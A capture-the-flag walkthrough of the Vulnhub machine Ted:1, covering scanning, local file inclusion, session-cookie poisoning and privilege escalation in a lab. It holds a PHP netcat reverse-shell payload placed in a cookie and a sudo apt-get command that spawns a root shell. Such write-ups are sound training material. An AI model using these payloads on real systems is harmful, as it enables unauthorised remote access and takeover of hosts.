Ted:1 Vulnhub Walkthrough
September 24, 2020 by Nasef
Ted:1 is a machine in which I used Local File Inclusion Vulnerability to obtain shell access and then exploited the misconfigured sudo permissions to get root Access.
As always, I started scanning with nmap
nmap -sV -sC 192.168.198.136 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 09:58 EDT Nmap scan report for 192.168.198.136 Host is up (0.00077s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Login Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
Port 80 is the only opened port.
Then I enumerated directories and files using gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.198.136 -x html,php =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.198.136 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: html,php [+] Timeout: 10s =============================================================== 2020/09/24 09:58:18 Starting gobuster =============================================================== /index.php (Status: 200) /home.php (Status: 302) /logout.php (Status: 302) /cookie.php (Status: 302) /authenticate.php (Status: 302) /server-status (Status: 403) =============================================================== 2020/09/24 09:59:06 Finished ===============================================================
An intersting file is cookie.php, although it didn’t help me to get a shell but it gave me a hint about using cookie with LFI to gain a shell.
I found a login form in index.php, So I tried SQLmap to test for SQL injection but the form isn’t vulnerable to it. Then, I started testing with inputs and error messages and it was fruitful. The error messages gave me hints about the the correct username and correct password then the correct hashing algorithm. You can see the diffrence below.
Hashing Algorithm guessing
The correct username is admin and the correct password is hash sha256 of word admin
Local File Inclusion
When I typed /etc/passwd it retrived the content of the file, so it’s clearly a LFI vulnerability.
After many attemps like reading /etc/shadow and Log poisoning via apache logs, I found a suspicous cookie. so I tried to change it’s value and access /var/lib/php/sessions/sess_ via the browser and it worked!
Immediately I changed the cookie value to
<?php system("nc [ip] 9999 -e /bin/sh")?>
but URL encoded as
and started listening in my machine and refreshed the page. I got a shell!
root@kali:/home/kali# nc -lvnp 9999 listening on [any] 9999 ... connect to [192.168.198.137] from (UNKNOWN) [192.168.198.136] 57674 whoami www-data
I ran sudo -l and noticed that I can run apt-get as a root without password (SUDO).
sudo -l Matching Defaults entries for www-data on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on ubuntu: (root) NOPASSWD: /usr/bin/apt-get
So imediatly I went to https://gtfobins.github.io/ and got the following command which abuses the sudo priv given to the binary apt-get
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh whoami root
and voila here is the root privilege!